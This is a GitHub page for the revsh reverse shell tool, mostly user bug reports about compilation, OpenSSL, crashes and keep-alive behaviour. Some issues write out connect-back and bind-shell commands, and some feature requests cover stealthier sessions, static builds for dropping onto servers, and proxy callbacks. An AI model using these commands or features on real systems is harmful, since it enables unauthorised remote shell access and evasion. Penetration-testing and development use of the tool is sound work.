emptymonkey / revsh Goto Github PK

View Code? Open in Web Editor NEW

459.0 459.0 105.0 597 KB

A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities.

License: MIT License

C 97.43% Makefile 2.57%

revsh's People

Stargazers

Watchers

Forkers

mutantmonkey charles-cai isafe jmvaughn sh1nu11bi shekkbuilder brianheeseis eltair pandaxbacon whf839 geekgalaxy frohoff ycaihua moriarty2016 jpomianek carnal0wnage theralfbrown akustolin madwind76 diudiuda jercherng yuang1516 mgcfish choutofu encapsulate jbarcia shantanu561993 minkione izogain pentestingtools team-firebugs tobey123 braneed h0k5 open-sec ch4p34un0ir ykankaya 0xfucker spag311 heikipikker incredibleindishell ajblane dlat xerpch mzpqnxow killvxk fengjixuchui hgomez dozme superf0sh l9sk axiom215 seabreg rulzgz attackgithub raystyle imulmul triplekill modulexcite lisen3-xiaomi tycoryco gebl superuser5 koushui 5l1v3r1 axax002 morristech hello-xbugs 020monkey alichry fdlucifer rodrigoieh exo-poulpe lccgithub zumb08 rescenic hartl3y94 fadinglr zha0 onlylonly duke2567134961 mk-kaiser peacesh4wn clayne marcostolosa xxxketaminekidxxx423 cybersecurity-labs oddir gongqianye241 cb0y

revsh's Issues

port to macos

how can i port it to macos??

doesn't compile - openssl issues

OS: Ubuntu 18.04 LTS

Makefile (devel)

# you expect someone to move some sort of openssl dependency relative to revsh? 
OPENSSL_DIR = ../openssl  
OPENSSL = $(OPENSSL_DIR)/apps/openssl

OpenSSL 1.1.0 API Changes (was "Failing on Pthread compilation")

Having compilation errors that appear to have a problem with the pthread library. Issue occurs using the top two build options inside the Makefile.

Issue has been seen on multiple Kali boxes, all of which are completely updated.

root@kali:~/Desktop/revsh# uname -a
Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU/Linux

Can get passed this error by adding -pthread to the LIBS in the Makefile. After which, I am confronted with this error:

Controller and Target Crash while using Socks Proxy

I found a bug where Controller and Target both would crash while downloading a file using Socks Proxy

The crash will happen randomly anytime your downloading or browsing using the socks proxy but I found a specific procedure to reproduce this bug

Both Target and Controller are running in keepalive mode
On Controller open Firefox and set it to use revsh socks proxy
Make sure that "Always ask you where to save files" is selected in Firefox / Preferences / General
Now try to browse a local network webserver and download a file that is +20MB in size in my test it was "vlc-2.2.6-win32.exe" and instead of choosing "Save" choose "Cancel"
Controller and Target will both crash

here is the last part of strace output from controller:

read(4, "\xbd\x13\x65\x9e\x51\x0e\x36\xcc\xec\x2f\x62\xd5\x5c\x25\xeb\xe6\x8d\xfe\xcc\x50\x10\x02\x31\xe9\xf3\x8f\xe0\x1f\x93\xfa\xaa\x20"..., 4128) = 914
read(4, 0x63a76a, 3214) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\xd2\xb5\xe6\x61\x80\x2f\x27\x1c\x7c\x60\xcc\x4c\x1c\x54\x25\x65\x45\xb2\x90\xdb\xe1\xb0\xd5\xb7\x46\xfa\xcc\xb9\x09\xf7\x30\x7b"..., 3214) = 1420
read(4, 0x63acf6, 1794) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\xeb\x6f\x06\x8d\xc7\xd7\xac\x40\x4a\x2c\xeb\x86\xf5\xe1\x32\x0e\xbb\x41\xa1\x7a\x82\x55\x86\x9d\xa3\xd6\x5c\x6b\x61\x8b\x94\x9c"..., 1794) = 1420
read(4, 0x63b282, 374) = -1 EAGAIN (Resource temporarily unavailable)
select(5, [4], NULL, NULL, NULL) = 1 (in [4])
read(4, "\x1f\x60\xfa\x65\xff\x58\xd6\x69\x95\xac\x27\xf7\xb2\xba\xd8\xd6\xf8\x12\x81\x2e\x2d\xda\xe5\x3c\x52\x03\xe3\x10\xbb\xa6\x21\xd8"..., 374) = 374
write(5, "\xb3\xf2\x26\xf0\xbc\x33\x7c\xa4\x8f\xec\xf6\xab\x53\xea\xd1\x88\x83\xdd\xa6\x0b\xbc\xb3\x85\xd6\x1e\x94\x5a\xcb\xe0\x61\x38\xbb"..., 4096) = -1 EPIPE (Broken pipe)
--- SIGPIPE {si_signo=SIGPIPE, si_code=SI_USER, si_pid=24072, si_uid=0} ---
+++ killed by SIGPIPE +++

Shell hangs if output buffer is too long

This happens to me quite a lot. When I perform a command which outputs a lot of output such as long file listing, the shell hangs and I have to initiate a separate connection to kill it. Even CTRL+C or any other combination of keys seem to be able to kill it.
Let me know if you need more details but this is kind of straightforward to test I think.

PS: This is one of the most useful tools I found in the last months :) it's really awesome, i use it a lot on CTFs and pentests.

Weird output on connection + random bytes

This happens when trying to connect from windows on linux (CLIENT) to instance compiled on ubuntu Ubuntu 16.04.2 LTS (SERVER). The client imidietely exits.

https://i.imgur.com/GZt0hE7.png

WHen trying to listen (SERVER) on Ubuntu 16.04.2 LTS, the application is stuck for good 2 minutes. Strace shows it's trying to read /dev/random bytes - on my system there was not enough random entropy - so it got stuck for 2-4 min.

Solutions?

Hiding rc from STDIN

I was thinking if we can hide or silence the output of sending "rc" file contents to target instead of making it popup on STDIN cause I'm finding myself adding lots of shell functions and env variables to automate and script some stuff but it's a little ugly when you open a session

config.h doesn't seem to support port numbers with 5 characters

Here is my config.h

However, when I try to launch the controller using the defaults, it appears to drop the last number.

A quick double check with nmap confirms that it's not just a printing issue but also a functionality issue.

Throwing away the defaults, I specify the arguments manually

Then the port appears open.

Assuming it's a parsing issue.

Defunct processes in keepalive mode.

From @alzzac:
"Hi, there is a new discover once I exited from the keep-alive connection, the [revsh] process will be added. Is it possible to fix this?"

This sounds like a problem with the child clean up code specific to keepalive. I'll look into this as soon as I get some free time.

Error on linux host without libssl

Please consider if possible only loading a library if a argument is used for it.

./revsh: error while loading shared libraries: libssl.so.1.0.0: cannot open shared object file: No such file or directory

revsh doesn't build with gcc version 10

Hi,

Seems something changed in gcc 10, I believe you need to add -fcommon to the CFLAGS in the Makefile.

https://wiki.gentoo.org/wiki/Gcc_10_porting_notes/fno_common

OpenSSL 3.0.0-alpha generated C code has different function name declaration than older OpenSSL versions

I was installing this, I've compiled OpenSSL and configured it with the advised arguments in the install instructions.

While trying to compile revsh, running make produced:

...
if [ ! -e keys/dh_params.c ]; then \
    ../openssl/apps/openssl dhparam -noout -C 2048 >keys/dh_params.c ; \
	echo "DH *(*get_dh)() = &get_dh2048;" >>keys/dh_params.c ; \
  fi
Generating DH parameters, 2048 bit long safe prime, generator 2
This is going to take a long time
.+........+......+..+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*
..+..+.+..+.........+..+...
...
keys/dh_params.c:75:20: error: 'get_dh2048' undeclared here (not in a function)
 DH *(*get_dh)() = &get_dh2048;

The generated C code in keys/dh_params.c is:

static DH *get_dh256(void)
{
    static unsigned char dhp_256[] = {
        0x96, 0x4E, 0x1B, 0xBE, 0x81, 0x01, 0x67, 0x67, 0x21, 0xFF,
        0x19, 0x63, 0x5C, 0x13, 0x02, 0x3E, 0xC0, 0xE7, 0xCA, 0x1A,
        0xB7, 0x59, 0x61, 0x08, 0x05, 0xE8, 0x0B, 0xF3, 0xB6, 0xD3,
        0x73, 0x3B, 0x26, 0x56, 0xF8, 0xB1, 0xDA, 0x42, 0xEB, 0x78,
        0xE9, 0xE5, 0x85, 0x70, 0x9E, 0x10, 0xA2, 0x80, 0x0D, 0x53,
        0xFF, 0x06, 0x61, 0xE1, 0x2F, 0xB7, 0x80, 0x42, 0x76, 0xE3,
        0x99, 0xAB, 0x32, 0x93, 0x65, 0xF0, 0xA2, 0xC6, 0x9E, 0x0F,
        0x52, 0xD1, 0x27, 0x6B, 0xDF, 0xCC, 0x99, 0x71, 0x65, 0x1E,
        0xBC, 0x89, 0xBC, 0x5D, 0xF4, 0x80, 0x9E, 0xC5, 0x19, 0xB5,
        0xE1, 0x0F, 0xE8, 0xAF, 0xE2, 0x75, 0x15, 0xED, 0xCE, 0x99,
        0xA6, 0xC5, 0xC5, 0xD1, 0xEA, 0xEE, 0x4E, 0xBB, 0x18, 0xAF,
        0xC5, 0x12, 0xE3, 0x93, 0x5D, 0xDC, 0xF7, 0xE2, 0xAB, 0x56,
        0x4A, 0x58, 0x60, 0x7D, 0x31, 0xA9, 0xCD, 0xA5, 0xF1, 0x40,
        0xD0, 0x93, 0xD4, 0x4A, 0x8B, 0x74, 0x43, 0xA3, 0x83, 0x3A,
        0xFA, 0xD7, 0xEE, 0x86, 0x59, 0xA3, 0x6F, 0xDA, 0x5E, 0x4C,
        0x39, 0xDB, 0x0E, 0x75, 0xCC, 0x40, 0xD5, 0xF5, 0x0B, 0x94,
        0xCC, 0xB2, 0xC7, 0x07, 0xEB, 0x1C, 0xEF, 0xFF, 0xD2, 0x9C,
        0x95, 0x5F, 0x48, 0x1D, 0x0B, 0x0E, 0xE5, 0xE1, 0x5F, 0x3E,
        0x01, 0xE8, 0xD6, 0xB6, 0x58, 0x86, 0x38, 0xBA, 0xC9, 0x50,
        0xB2, 0x5C, 0x83, 0xC1, 0xB2, 0x78, 0xAB, 0x07, 0xDD, 0x17,
        0xAC, 0x4D, 0xA6, 0x37, 0x0C, 0x3A, 0xCB, 0xE9, 0xE2, 0x0C,
        0x06, 0xB0, 0xE2, 0x6E, 0x19, 0x90, 0x00, 0xEA, 0xDA, 0x77,
        0xD2, 0xA4, 0xCE, 0x93, 0x7F, 0x13, 0x33, 0x7E, 0xF5, 0x3E,
        0x31, 0xF9, 0x77, 0xAA, 0x39, 0x71, 0xFF, 0xAD, 0x02, 0x41,
        0x62, 0x57, 0xF5, 0xC1, 0x26, 0xAE, 0xA2, 0xC0, 0x29, 0x48,
        0x28, 0xE2, 0x86, 0x4C, 0xB4, 0x0D
    };
    static unsigned char dhg_256[] = {
        0x0E, 0x5B, 0xAB, 0x57, 0x41, 0x6E, 0x82, 0x3C, 0x10, 0x92,
        0x8B, 0x18, 0x0D, 0xD5, 0x66, 0xF7, 0x33, 0x5E, 0x35, 0xAF,
        0xFF, 0x7A, 0x56, 0x87, 0x8A, 0xDA, 0x5D, 0xD4, 0xF4, 0x2E,
        0xB1, 0x77, 0x2F, 0x79, 0xB3, 0x77, 0x95, 0xC5, 0x8E, 0x9C,
        0xB0, 0x2A, 0xCE, 0x3A, 0x0F, 0xF5, 0x55, 0x0F, 0x06, 0x12,
        0x9B, 0xEC, 0x90, 0x42, 0x9B, 0x4B, 0xCA, 0xF5, 0x72, 0x70,
        0x8A, 0xE2, 0xEC, 0x5C, 0x13, 0x1D, 0xB3, 0x03, 0xC2, 0xCE,
        0xF4, 0x08, 0xF2, 0x63, 0x65, 0xF3, 0x53, 0xD6, 0x02, 0xA7,
        0x19, 0x11, 0x2D, 0x6C, 0x5A, 0x82, 0x06, 0xEF, 0xC7, 0x3E,
        0x92, 0x1E, 0xE1, 0x64, 0x71, 0xB4, 0x88, 0x91, 0x5E, 0xD3,
        0xCF, 0x16, 0xB3, 0x3E, 0xB2, 0x8D, 0xB0, 0x61, 0x7F, 0x23,
        0xA3, 0x39, 0x69, 0x3E, 0x9D, 0x44, 0x92, 0x57, 0xED, 0x90,
        0xF1, 0x0C, 0xB2, 0x28, 0xD0, 0x61, 0x4B, 0x2A, 0x70, 0xE7,
        0x82, 0xCC, 0x75, 0x92, 0x1E, 0x65, 0x3A, 0x56, 0x85, 0x0D,
        0x3F, 0x40, 0x59, 0x0A, 0x45, 0xEF, 0x99, 0x03, 0x88, 0x8C,
        0xD5, 0x82, 0xC3, 0xE2, 0x6F, 0x1F, 0x2B, 0xBD, 0x0F, 0x50,
        0xAD, 0xD6, 0x46, 0x26, 0xBD, 0x02, 0x58, 0x41, 0xA9, 0x00,
        0xE5, 0x23, 0x0E, 0x0A, 0xD6, 0x10, 0xEB, 0x9B, 0x81, 0x0B,
        0xB2, 0x53, 0x73, 0x35, 0xF9, 0xBE, 0x5C, 0x86, 0x33, 0xE4,
        0xAA, 0x10, 0x34, 0xA5, 0x0A, 0x63, 0x06, 0x0E, 0xF3, 0x4B,
        0x4C, 0xDB, 0xE4, 0x28, 0xED, 0x1B, 0x4D, 0x43, 0x62, 0x46,
        0xF5, 0xD3, 0x55, 0x67, 0x7D, 0xEC, 0x6A, 0x2F, 0x61, 0x5A,
        0x0F, 0x8C, 0xAA, 0xFA, 0x20, 0xE2, 0x40, 0xD2, 0x1D, 0x39,
        0xE9, 0x08, 0x99, 0xAF, 0x7E, 0x0A, 0x32, 0xBE, 0xA6, 0xC9,
        0xB0, 0x6E, 0x09, 0x94, 0xFB, 0xD7, 0xF8, 0xE4, 0xAC, 0xEB,
        0xFC, 0x1D, 0xD4, 0xB9, 0x0A, 0xF0
    };
    DH *dh = DH_new();
    BIGNUM *p, *g;

    if (dh == NULL)
        return NULL;
    p = BN_bin2bn(dhp_256, sizeof(dhp_256), NULL);
    g = BN_bin2bn(dhg_256, sizeof(dhg_256), NULL);
    if (p == NULL || g == NULL
            || !DH_set0_pqg(dh, p, NULL, g)) {
        DH_free(dh);
        BN_free(p);
        BN_free(g);
        return NULL;
    }
    return dh;
}
DH *(*get_dh)() = &get_dh2048;

If I generate the C code using the OpenSSL binary installed on my system and not the compiled one, the generated function declaration is

$ openssl dhparam -noout -C 2048
#ifndef HEADER_DH_H
#include <openssl/dh.h>
#endif
DH *get_dh2048()
        {
        static unsigned char dh2048_p[]={
                0x86,0xB5,0x48,0xF3,0x63,0xE2,0x92,0x97,0xC1,0x5B,0xEC,0x3A,
                0x40,0xFF,0x3E,0xA9,0x64,0xBC,0x24,0x11,0x3D,0xC0,0x9A,0x57,
                0xCF,0xF5,0x02,0xFA,0x08,0xF5,0x1A,0x50,0x08,0x77,0x2E,0xD9,
                0x20,0x5B,0xB0,0xA7,0xAA,0x32,0xC1,0x54,0xF1,0xF3,0x29,0xBE,
                0x34,0x54,0xD6,0xC1,0x57,0x2F,0x35,0xED,0x7F,0xE4,0xE0,0x46,
                0x82,0x28,0x0D,0xB2,0xB2,0x30,0x7E,0x43,0xCB,0x98,0xBA,0x09,
                0x75,0x72,0xED,0x71,0xD0,0x2D,0xE6,0xAD,0x45,0x2E,0xE8,0x37,
                0x48,0x81,0x1F,0x94,0x3C,0x1C,0x5B,0x22,0x67,0x6E,0xB2,0x96,
                0xBD,0x26,0x75,0x59,0x4E,0xCF,0x2F,0xA0,0x26,0x70,0x4A,0xF6,
                0x8C,0xAF,0x69,0x88,0x2B,0x05,0x59,0x5E,0x60,0xFD,0x4F,0xB7,
                0xBC,0x63,0x96,0x0F,0xC2,0xE1,0x9B,0xF9,0x71,0x1B,0x0F,0x05,
                0x74,0x5D,0xAB,0xF5,0x37,0x65,0x50,0xF0,0x9F,0xF4,0x3F,0xE6,
                0x21,0xB9,0x28,0xAA,0x68,0xC8,0x11,0xC2,0xB6,0x30,0xD3,0x8D,
                0xB8,0x3E,0x6E,0x9D,0x24,0xE0,0xE8,0xDF,0xEE,0x0E,0x4F,0xDD,
                0xC6,0x55,0x7F,0xC3,0x5D,0x48,0xC1,0x20,0x01,0x79,0xCE,0x12,
                0xEA,0x9C,0xAD,0x32,0xC5,0x62,0x01,0xA2,0x40,0x36,0xB9,0x8E,
                0x9B,0x72,0xF4,0xBB,0xA7,0x38,0xEF,0x44,0xC0,0x46,0xAC,0x91,
                0xE4,0xF2,0x5C,0x1A,0xC6,0xF4,0xE3,0x3C,0x36,0x17,0x6F,0x41,
                0x87,0xB7,0x2A,0xB8,0xF8,0xF9,0x5D,0x9C,0x6F,0x09,0x71,0x66,
                0xB1,0xD1,0xF5,0xA7,0x05,0x4F,0xB3,0x93,0x54,0x81,0x36,0x18,
                0x7D,0x93,0x50,0xFB,0x68,0x55,0xAB,0x48,0xE9,0x7B,0x4C,0xAF,
                0x74,0xB6,0xFA,0x03,
                };
        static unsigned char dh2048_g[]={
                0x02,
                };
        DH *dh;

        if ((dh=DH_new()) == NULL) return(NULL);
        dh->p=BN_bin2bn(dh2048_p,sizeof(dh2048_p),NULL);
        dh->g=BN_bin2bn(dh2048_g,sizeof(dh2048_g),NULL);
        if ((dh->p == NULL) || (dh->g == NULL))
                { DH_free(dh); return(NULL); }
        return(dh);
        }

Compiled OpenSSL version:

$ ../openssl/apps/openssl version  
OpenSSL 3.0.0-alpha5-dev  (Library: OpenSSL 3.0.0-alpha5-dev )

Installed OpenSSL version:

$ openssl version
OpenSSL 1.0.2k-fips  26 Jan 2017

Obviously cloning the latest branch commit of OpenSSL can raise compatibility issues with future releases of OpenSSL. I'll be happy to create a PR to modify the INSTALL instructions, or instead maybe we use can use sed to get the declared function name instead of hardcoding it.

gcc can't compile revsh

OS: Kali Linux x86_64

I tried compiling with make and it gave me an error:

/usr/bin/cc -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL -o in_the_key_of_c in_the_key_of_c.c /usr/lib/x86_64-linux-gnu/libssl.a /usr/lib/x86_64-linux-gnu/libcrypto.a -ldl
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_lock_new': (.text+0x25): undefined reference to pthread_rwlock_init'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_read_lock': (.text+0x55): undefined reference to pthread_rwlock_rdlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_write_lock': (.text+0x75): undefined reference to pthread_rwlock_wrlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_unlock': (.text+0x95): undefined reference to pthread_rwlock_unlock'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_lock_free': (.text+0xba): undefined reference to pthread_rwlock_destroy'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_run_once': (.text+0xe5): undefined reference to pthread_once'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_init_local': (.text+0x105): undefined reference to pthread_key_create'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_set_local': (.text+0x137): undefined reference to pthread_setspecific'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_cleanup_local': (.text+0x157): undefined reference to pthread_key_delete'
/usr/lib/x86_64-linux-gnu/libcrypto.a(threads_pthread.o): In function CRYPTO_THREAD_get_local': (.text+0x123): undefined reference to pthread_getspecific'
collect2: error: ld returned 1 exit status
Makefile:138: recipe for target 'in_the_key_of_c' failed
make: *** [in_the_key_of_c] Error 1

Thanks for your help!

Proxy support in connectback

A useful feature would be to support proxies for making the connection - for example, if the box you want to get a callback from has an outbound SOCKS/HTTP proxy server for outgoing connections.

Unsure how much of a pain in the ass it would be to add, but there is already some SOCKS code in there that could possibly be reused somewhat.

Improper error reporting when binding to domain name that doesn't resolve.

empty@monkey:~/tmp/revsh$ ./revsh -c -vvv foo.bar.com
First example:

Controller: Listening on foo.bar.com:2200.
�Ռ: 6795616: BIO_do_accept(0): (null)
25909320:error:2006A066:BIO routines:BIO_get_host_ip:bad hostname lookup:b_sock.c:146:host=foo.bar.com
do_control(): init_io_control(18b7cc0): Success

Statically compile for dropping onto remote servers?

Hey, so the intended use is to drop /usr/local/bin/revsh onto a host after install, right?

Maybe there should be an extra build step to generate a full static build into a folder. I went into the makefile and set the static build cflags and everything worked fine, but it'd probably be beneficial to usability.

Thanks for the tool though, it's much more convenient than socat.

Compatibility Mode breaks `make install`

In compatibility mode, the KEYS_DIR variable is set to ""

Therefore, when the make install is run...

if [ ! -e $(HOME)/.revsh ]; then \
                mkdir $(HOME)/.revsh ; \ #REFERENCE 1
        fi
        if [ -e $(HOME)/.revsh/$(KEYS_DIR) ]; then \ #REFERENCE 2
                echo "\nERROR: $(HOME)/.revsh/$(KEYS_DIR) already exists! Move it safely out of the way then try again, please." ; \ 
        else \

Example:

It will create the /root/.revsh directory at REFERENCE 1

Then it will complain about the /root/.revsh directory at REFERENCE 2 because the KEYS_DIR variable is empty.

This can become very frustrating for the user as they try to rm -rf the directory and it magically reappears. 😈

Keep-alive in bindshell mode breaks after disconnect.

Control:
empty@monkey:~/code/revsh$ ./revsh -c -d keys/ -b 127.0.0.1

Target:
empty@monkey:~/code/revsh$ ./revsh -b -k 127.0.0.1

Upon connect, target throws a memory error:
*** Error in './revsh': double free or corruption (fasttop): 0x00000000028f3770 ***

After exit, target daemonizes, allows second connection, finishes initialization, but hangs upon entering the broker() loop.

SSL_connect

Connecting to TCP redirector (socat) or any another TCP port:

Control:
# socat TCP-LISTEN:2200,fork TCP:192.168.1.3:2200
2018/10/12 12:02:31 socat[17645] E connect(5, AF=2 192.168.1.3:2200, 16): Connection refused
where 192.168.1.3:2200 closed port

Target:
# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to 192.168.1.2:2200...	Connected!
init_io_target(): SSL_connect(8b62f50): Success
do_target(): init_io_connect(8b4f760): Success

If connect to revsh server with different keys (control_key.pem target_key.pem target_cert.pem):

Target:
# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to 192.168.1.2:2200...	Connected!
negotiate_protocol(): io->remote_read(bfc2e1de, 2): Success
do_target(): negotiate_protocol(): Success

Control:
Listening on 0.0.0.0:2200...Listening on 0.0.0.0:2200...Listening on 0.0.0.0:2200...

If revsh on server side in offline, trying connect from client:

# ./revsh -vv 192.168.1.2 -k -r 5,10 -t 0
Connecting to  192.168.1.2:2200...init_io_target(): BIO_do_connect(8540cb8): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 7 seconds...
Connecting to 192.168.1.2:2200...init_io_target(): BIO_do_connect(853eb40): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 5 seconds...
Connecting to 192.168.1.2:2200...init_io_target(): BIO_do_connect(8540c28): Connection refused
0:error:0200206F:system library:connect:Connection refused:crypto/bio/b_sock2.c:110:
0:error:2008A067:BIO routines:BIO_connect:connect error:crypto/bio/b_sock2.c:111:
0:error:0200206F:system library:connect:Connection refused:crypto/bio/bss_conn.c:173:hostname=192.168.1.2 service=2200
0:error:20073067:BIO routines:conn_state:connect error:crypto/bio/bss_conn.c:177:
Retrying in 6 seconds...

revsh info:
default config, no changes in source code
Debian wheezy x86

make clean fails with error

can't remove $bunch_of_stuff.o: No such file or directory

probably add rm -f in Makefile to clean target

Controller crashes by hitting port with a browser (connection without client certificate)

I really didn't think that revsh can't handle this errors and it would simply crash!

peer did not return a certificate on port 443:
Controller: Listening on 0.0.0.0:443. Controller: Connected from xxx.xxx.xxx.xxx:64064. init_io_control(): SSL_accept(633d90): Success 140491016673024:error:1417C0C7:SSL routines:tls_process_client_certificate:peer did not return a certificate:../ssl/statem/statem_srvr.c:2879: do_control(): init_io_control(614120): Success

unknown ca on random port:
Controller: Listening on 0.0.0.0:4433. Controller: Connected from xxx.xxx.xxx.xxx:64202. init_io_control(): SSL_accept(633d70): Success 140704924813056:error:14094418:SSL routines:ssl3_read_bytes:tlsv1 alert unknown ca:../ssl/record/rec_layer_s3.c:1399:SSL alert number 48 do_control(): init_io_control(614120): Success

Connect back keep-alive mode, "Bad file descriptor" after reconnect.

Reported by twitter user @alzzac.

I've been unable to reproduce this yet. I'll audit the keep-alive code and see if I can find any issues there.